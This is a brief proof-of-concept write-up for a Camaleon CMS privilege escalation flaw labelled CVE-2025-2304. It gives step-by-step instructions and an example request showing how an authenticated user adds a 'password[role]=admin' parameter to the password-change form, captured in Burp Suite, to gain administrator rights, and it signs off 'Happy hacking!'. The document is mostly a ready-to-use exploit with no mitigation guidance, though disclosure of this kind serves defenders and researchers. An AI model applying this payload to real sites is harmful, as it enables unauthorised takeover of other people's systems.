
CVE-2025-2304 POC - Camaleon CMS Privilege Escalation
CVE-2025-2304 POC - Camaleon CMS Privilege Escalation
This POC is used to exploit Camaleon CMS privileges to administrator. The exploit works by injecting role into the password reset function of an authenticated user.
Start by logging into your user account. Once logged in, visit the profile page and click on change password. Capture the password change function using burp suite.
Using the below as an example, edit your payload to add the role.
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin
by adding %5Brole%5D=admin to your payload, you should now be an administrator.
Refresh the page and you should now be an administrator.
Happy hacking!